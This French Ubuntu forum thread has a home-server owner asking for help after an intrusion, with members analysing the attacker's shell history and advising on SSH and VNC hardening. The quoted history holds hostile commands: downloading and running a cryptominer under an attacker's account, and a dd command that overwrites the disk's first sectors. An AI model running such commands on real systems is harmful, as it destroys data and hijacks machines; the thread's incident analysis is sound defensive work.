Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

Pages : 1

#1 Le 30/09/2016, à 08:29

fredsaule

Petite intrusion - j'ai besoin d'analyse

Bonjour,

Hier soir, je me suis connecté sur mon serveur personnel (à domicile) et j'ai eu la surprise de voir le fond d'écran changé (l'image n'était pas dans mes goûts esthétiques).

J'ai un petit serveur à la maison, j'y accède avec tightvnc et ssh en complément (je ne fais pas de tunneling, mais je le mets en place ce matin).

Je ne sais pas précisément comment le pirate s'est introduit dans ma machine, mais il n'avait visiblement pas trouvé mon passwd. En témoigne ce que dit "history" :

   304  cat /proc/cpuinfo
   305  id
   306  ps aux
   307  cat /proc/cpuinfo
   308  df
   309  df -h
   310  lscpu
   311  top c
   312  sudo su
   313  dpkg
   314  wget minergate.com/download/deb-cli
   315  dpkg -x deb-cli .deb
   316  cd .deb/opt/minergate-cli/
   317  ./minergate-cli
   318  ./minergate-cli  -user alekx12555@mail.ru -bcn
   319  screen ~~
   320  ./minergate-cli  -user alekx12555@mail.ru -bcn
   321  sudo dd if=/dev/urandom of=/dev/sda count=512

Je n'identifie pas certaines commandes...Notamment :
_ minergate-cli semble être en relation avec les bitcoins.
_ deb-cli m'est inconnu aussi
_ screen ~~, connait pas
_ par contre la dernière commande (qui n'a pas marché car il n'a pas trouvé mon mdp) me semble très offensive (sudo dd if=/dev/urandom of=/dev/sda count=512)

J'ai bien évidemment coupé le NAT qui mène à mon port VNC car je suppose qu'il est entré par là. J'ai changé mon passwd (au cas où).

Je cherche des solutions pour savoir quels sont les ports ouverts sur ma machine et comment sécuriser mon accès (en graphique évidemment).

Merci pour vos conseils.

Fredsaule

Hors ligne

#2 Le 30/09/2016, à 08:53

pitmix

Re : Petite intrusion - j'ai besoin d'analyse

Bonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/ … curite.php

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

Dernière modification par pitmix (Le 30/09/2016, à 08:57)

Toshiba AMD A4-5000 APU avec Radeon (TM) HD graphics 1.5Ghz x64 avec 4go de Ram sous Ubuntu 14.04LTS dual boot Windows 8.1 upgrade Windows 10

Hors ligne

#3 Le 30/09/2016, à 08:54

Nasman

Re : Petite intrusion - j'ai besoin d'analyse

Vu la logique des instructions passées, il semble qu'il devait avoir les droits sudo car après le sudo su (qui fait passer en root - et qui ne demande plus de mot de passe par la suite) apparaissent des instructions pour télécharger puis installer le programme ./minergate-cli
Je pense que s'il s'était fait jeter, il n'aurait pas poursuivi la manœuvre (à moins que ce soit un script qui faisait tout cela machinalement).

A priori la dernière commande devait effacer les 512 premiers secteurs (de 512 octets - option de bs par défaut) du disque

PS: comment te connectes tu par ssh à ton serveur, par clé ou par mot de passe ?

Dernière modification par Nasman (Le 30/09/2016, à 08:55)

PC fixe sous Bionic 64 bits et portable avec Focal 64 bits

Hors ligne

#4 Le 30/09/2016, à 09:13

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

Bonjour,

Je me connecte en ssh par passwd (pas par clé) et aussi en direct par tightvnc (ce n'est plus vrai à présent car je fais du tunnel).

Je ne pense pas qu'il avait root pour 3 raisons :
_ la dernière commande n'a (à priori) pas marché sinon ma partition serait morte (j'ai rebooté hier sans problème).
_ L'autre aspect c'est que j'ai fait "history" en root et que rien n'est sorti.
_ j'ai retrouvé les reliquats d'installation dans /home/<mon user>, pas dans /root ou ailleurs.

Merci,
Fredsaule

Dernière modification par fredsaule (Le 30/09/2016, à 09:21)

Hors ligne

#5 Le 30/09/2016, à 09:17

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

Merci, c'est pas mal comme site !

Fredsaule

pitmix a écrit :

Bonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/ … curite.php

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

Hors ligne

#6 Le 30/09/2016, à 09:40

pires57

Re : Petite intrusion - j'ai besoin d'analyse

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

Effectivement, dans le contexte présent ce n'est pas une histoire de clone de disque.
Dans le cas présent on remplace le contenu des 512 premier octets de /dev/sda par le contenu de /dev/urandom.
Grossièrement cela reviens à supprimer le contenu de  ton MBR ainsi que celui de ta table des partitions.

Pourrais tu retourner :
- le fichier de config de ton SSH
- le fichier de log SSH
- le retour des commandes : 

netstat -tanu

top

dpkg --get-selections |grep minergate*

Tu as de la chance qu'il n'ai pas eu les droits  root pour la dernière commande.

Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

Hors ligne

#7 Le 30/09/2016, à 10:33

Nasman

Re : Petite intrusion - j'ai besoin d'analyse

La syntaxe de dd est la suivante :
if= origine du fichier source, /dev/urandom générateur de nombre aléatoires
of= destination des blocs, ici ton disque dur sda
bs= taille d'un bloc de données, par défaut 512 octets
count= nombre de blocs traités, ici 512 blocs (de 512 octets), donc effacerait le mbr et les 511 secteurs suivants (dont le bloc à la LBA=1 qui peut contenir core.img, ou les entête gpt...)
skip= nombre de bloc sautée sur la source
seek= nombre de blocs sautés sur la destination

Si la commande avait été effective, ton système n'aurait pu être lancé mais il est possible de réaccéder à la partition système si cette dernière était alignée au mio (2048 secteurs de 512 octets). Avec un alignement au cylindre, les partitions commençant avant le 512ème secteur (adresse LBA) auraient été détruites définitivement.

Dernière modification par Nasman (Le 30/09/2016, à 10:38)

PC fixe sous Bionic 64 bits et portable avec Focal 64 bits

Hors ligne

#8 Le 30/09/2016, à 10:57

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

Voici les éléments demandés :

- le fichier de config de ton SSH

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   RhostsRSAAuthentication no
#   RSAAuthentication yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/identity
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Cipher 3des
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

- le fichier de log SSH (de la période supposée de l'intrusion) :

Sep 29 10:05:08 gevara sshd[7035]: Disconnected from 221.194.47.229 port 33058 [preauth]
Sep 29 10:05:08 gevara sshd[7035]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229  user=root
Sep 29 10:05:13 gevara sshd[7037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229  user=root
Sep 29 10:05:14 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:17 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:18 gevara sshd[7039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 29 10:05:19 gevara sshd[7039]: Failed password for root from 221.229.172.76 port 30319 ssh2
Sep 29 10:05:19 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:08:57 gevara dbus[525]: [system] Failed to activate service 'org.bluez': timed out
Sep 29 10:09:19 gevara sshd[7311]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:21 gevara sshd[7311]: Failed password for root from 119.249.54.88 port 49429 ssh2
Sep 29 10:09:26 gevara sshd[7311]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 49429 ssh2]
Sep 29 10:09:27 gevara sshd[7311]: Received disconnect from 119.249.54.88 port 49429:11:  [preauth]
Sep 29 10:09:27 gevara sshd[7311]: Disconnected from 119.249.54.88 port 49429 [preauth]
Sep 29 10:09:27 gevara sshd[7311]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:29 gevara sshd[7335]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:31 gevara sshd[7335]: Failed password for root from 119.249.54.88 port 55541 ssh2
Sep 29 10:09:36 gevara sshd[7335]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 55541 ssh2]
Sep 29 10:09:37 gevara sshd[7335]: Received disconnect from 119.249.54.88 port 55541:11:  [preauth]
Sep 29 10:09:37 gevara sshd[7335]: Disconnected from 119.249.54.88 port 55541 [preauth]
Sep 29 10:09:37 gevara sshd[7335]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:39 gevara sshd[7355]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:41 gevara sshd[7355]: Failed password for root from 119.249.54.88 port 34660 ssh2
Sep 29 10:15:44 gevara sshd[7474]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 29 10:15:45 gevara sshd[7474]: Failed password for root from 221.229.172.76 port 39707 ssh2
Sep 29 10:15:50 gevara sshd[7474]: message repeated 2 times: [ Failed password for root from 221.229.172.76 port 39707 ssh2]
Sep 29 10:15:50 gevara sshd[7474]: Received disconnect from 221.229.172.76 port 39707:11:  [preauth]
Sep 29 10:15:50 gevara sshd[7474]: Disconnected from 221.229.172.76 port 39707 [preauth]

et visiblement les tests pour entrer son toujours en cours :

Sep 30 10:51:13 gevara sshd[9748]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 30 10:51:14 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Received disconnect from 121.18.238.109 port 42139:11:  [preauth]
Sep 30 10:51:17 gevara sshd[9750]: Disconnected from 121.18.238.109 port 42139 [preauth]
Sep 30 10:51:17 gevara sshd[9750]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109  user=root
Sep 30 10:51:21 gevara sshd[9754]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109  user=root
Sep 30 10:51:23 gevara sshd[9754]: Failed password for root from 121.18.238.109 port 33234 ssh2
Sep 30 10:51:41 gevara sshd[9762]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 30 10:51:43 gevara sshd[9762]: Failed password for root from 221.229.172.76 port 41063 ssh2

(fort heureusement, mon root est inaccessible)

- le retour des commandes : 

netstat -tanu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat
tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6002            0.0.0.0:*               LISTEN
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:51413           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.11:51413      208.59.172.218:63746    TIME_WAIT
tcp        0      0 192.168.0.11:51413      79.70.37.215:64353      TIME_WAIT
tcp        0      0 192.168.0.11:51413      112.206.104.223:56884   TIME_WAIT
tcp        0      0 192.168.0.11:51413      208.59.172.218:63742    TIME_WAIT
tcp        0      0 192.168.0.11:40786      207.66.141.182:443      CLOSE_WAIT
tcp        1      0 192.168.0.11:40802      207.66.141.182:443      CLOSE_WAIT
tcp        0      0 192.168.0.11:51413      5.13.167.119:2292       TIME_WAIT
tcp        0      0 192.168.0.11:57992      104.20.40.187:80        ESTABLISHED
tcp        0      1 192.168.0.11:51413      89.140.204.131:4485     FIN_WAIT1
tcp        0    256 192.168.0.11:22         192.168.0.254:53796     ESTABLISHED
tcp        0      0 192.168.0.11:51413      197.149.178.174:64423   TIME_WAIT
tcp6       0      0 :::5900                 :::*                    LISTEN
tcp6       0      0 :::51413                :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
udp        0      0 0.0.0.0:5353            0.0.0.0:*
udp        0      0 0.0.0.0:47015           0.0.0.0:*
udp        0      0 127.0.1.1:53            0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 192.168.0.11:123        0.0.0.0:*
udp        0      0 127.0.0.1:123           0.0.0.0:*
udp        0      0 0.0.0.0:123             0.0.0.0:*
udp        0      0 0.0.0.0:51413           0.0.0.0:*
udp6       0      0 fe80::d869:80da:6bc:123 :::*
udp6       0      0 ::1:123                 :::*
udp6       0      0 :::123                  :::*
top
top - 10:54:04 up 13:07,  2 users,  load average: 0,03, 0,04, 0,00
Tâches: 156 total,   1 en cours, 155 en veille,   0 arrêté,   0 zombie
%Cpu(s):  2,8 ut,  0,3 sy,  0,1 ni, 96,8 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st
KiB Mem :  4029024 total,   644600 libr,   979972 util,  2404452 tamp/cache
KiB Éch: 19530748 total, 19527960 libr,     2788 util.  2694648 dispo Mem

  PID UTIL.     PR  NI    VIRT    RES    SHR S  %CPU %MEM    TEMPS+ COM.
 9857 fredsau+  20   0   41992   3992   3312 R  11,8  0,1   0:00.02 top
    1 root      20   0  119924   6080   4000 S   0,0  0,2   0:23.07 systemd
    2 root      20   0       0      0      0 S   0,0  0,0   0:00.00 kthreadd
    3 root      20   0       0      0      0 S   0,0  0,0   0:00.06 ksoftirqd/0
    5 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/0:0H
    7 root      20   0       0      0      0 S   0,0  0,0   0:13.02 rcu_sched
    8 root      20   0       0      0      0 S   0,0  0,0   0:00.00 rcu_bh
    9 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/0
   10 root      rt   0       0      0      0 S   0,0  0,0   0:00.16 watchdog/0
   11 root      rt   0       0      0      0 S   0,0  0,0   0:00.17 watchdog/1
   12 root      rt   0       0      0      0 S   0,0  0,0   0:00.04 migration/1
   13 root      20   0       0      0      0 S   0,0  0,0   0:00.42 ksoftirqd/1
   15 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/1:0H
   16 root      rt   0       0      0      0 S   0,0  0,0   0:00.16 watchdog/2
   17 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/2
   18 root      20   0       0      0      0 S   0,0  0,0   0:00.12 ksoftirqd/2
   20 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/2:0H
   21 root      rt   0       0      0      0 S   0,0  0,0   0:00.09 watchdog/3
   22 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/3
   23 root      20   0       0      0      0 S   0,0  0,0   0:00.07 ksoftirqd/3
   25 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/3:0H
   26 root      20   0       0      0      0 S   0,0  0,0   0:00.00 kdevtmpfs
   27 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 netns
   28 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 perf
   29 root      20   0       0      0      0 S   0,0  0,0   0:00.04 khungtaskd
   30 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 writeback
   31 root      25   5       0      0      0 S   0,0  0,0   0:00.00 ksmd
   32 root      39  19       0      0      0 S   0,0  0,0   0:01.18 khugepaged
   33 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 crypto
   34 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kintegrityd
   35 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 bioset
dpkg --get-selections |grep minergate*

La commande ne rend rien

Merci,
Fredsaule

Hors ligne

#9 Le 30/09/2016, à 11:00

bruno

Re : Petite intrusion - j'ai besoin d'analyse

Bonjour,

Tout d'abord si tu as une suspicion d'intrusion et que tu ne sais pas jusqu'où l'intrus a pu aller, il faut réinstaller complètement le système. Si tu veux poursuivre l'analyse de l'intrusion il faut déconnecter le serveur du réseau.

Visiblement l'intrus a simplement essayé d'installer un mineur de monnaie virtuelle (Bitcoin ou autre). Il n'était pas très doué puisqu'il a laissé ses commandes visibles dans l'historique, alors qu'il est extrêmement simple de faire en sorte que les commandes tapées ne soient pas enregistrées. Le « sudo su » ne plaide pas non plus en la faveur d'un hackeur de haut vol wink. Mais cela ne veut pas dire qu'il n'a pas commis d'autre dégâts par la suite…


D'un point de vue sécurité un accès VNC depuis l'Internet c'est très risqué (de toute façon un « serveur » ne devrait pas avoir d'interface graphique…). À éviter donc, ou à limiter strictement à certaines IP  à travers un tunnel SSH et/ou au réseau local.

L'accès ssh peut être ouvert sur l'Internet à condition de le sécuriser un minimum : mot de passe très fort et/ou mieux accès par clé (RSA 4096 bits ou ed25519).

EDIT : si tu veux nous montrer ta configuration ssh, c'est le fichier sshd_config qu'il faut donner…

Dernière modification par bruno (Le 30/09/2016, à 11:02)

Hors ligne

#10 Le 30/09/2016, à 11:07

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

Bonjour,

Merci pour ce retour - je comprends (avec un peu de retard) que tightvnc n'est pas sécure du tout.

Voici le fichier de configuration ssh:

# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

GatewayPorts yes

Cdt,
Fredsaule

Dernière modification par fredsaule (Le 30/09/2016, à 11:07)

Hors ligne

#11 Le 30/09/2016, à 11:29

jplemoine

Re : Petite intrusion - j'ai besoin d'analyse

Et perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.

Dernière modification par jplemoine (Le 30/09/2016, à 11:30)

Membre de l'ALDIL (Association Lyonnaise pour le Développement de l'Informatique Libre)
- En pro, après 20 ans de développement, administrateur Linux / Unix depuis Avril 2019.
- En privé, sous Ubuntu-Xubuntu depuis 2009.

Hors ligne

#12 Le 30/09/2016, à 11:39

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

jplemoine a écrit :

Et perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.

Fail2ban est présent et je suis en train de le tuner pour blacklister les indélicats.

Merci,
Fredsaule

Hors ligne

#13 Le 30/09/2016, à 13:46

pires57

Re : Petite intrusion - j'ai besoin d'analyse

Alors :

Tu as pas mal de service en écoute (LISTEN).  (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.

Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

Hors ligne

#14 Le 30/09/2016, à 14:19

fredsaule

Re : Petite intrusion - j'ai besoin d'analyse

Merci pour tes conseils.
J'ai déjà rallongé et complexifié mon mot de passe.
Je ne comprends pas comment autant d'IP peuvent me cibler (j'ai fait du ménage à la main avec iptable DROP)

Je te rejoins sur le fait de ne pas avoir d'interface graphique distante, néanmoins je reste attaché à la session X.

Je vais voir.

Cdt,
Fredsaule

pires57 a écrit :

Alors :

Tu as pas mal de service en écoute (LISTEN).  (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.

Hors ligne

Pages : 1